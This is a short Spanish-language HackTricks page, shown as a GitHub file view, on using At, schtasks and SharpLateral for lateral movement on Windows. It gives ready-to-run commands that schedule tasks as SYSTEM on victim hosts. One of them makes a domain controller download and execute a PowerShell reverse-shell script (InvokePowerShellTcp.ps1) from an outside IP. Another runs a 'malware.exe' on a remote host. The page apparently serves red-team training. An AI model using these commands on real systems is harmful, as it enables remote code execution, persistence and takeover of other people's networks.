Skip to content

Latest commit

 

History

History
61 lines (44 loc) · 3.43 KB

File metadata and controls

61 lines (44 loc) · 3.43 KB

AtExec / SchtasksExec

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

¿Cómo funciona?

At permite programar tareas en hosts donde conoces el nombre de usuario/(contraseña/Hash). Por lo tanto, puedes usarlo para ejecutar comandos en otros hosts y obtener la salida.

At \\victim 11:00:00PM shutdown -r

Usando schtasks primero necesitas crear la tarea y luego llamarla:

{% code overflow="wrap" %}

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

{% endcode %}

{% code overflow="wrap" %}

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

{% endcode %}

También puedes usar SharpLateral:

{% code overflow="wrap" %}

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

{% endcode %}

Más información sobre el uso de schtasks con tickets de plata aquí.

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: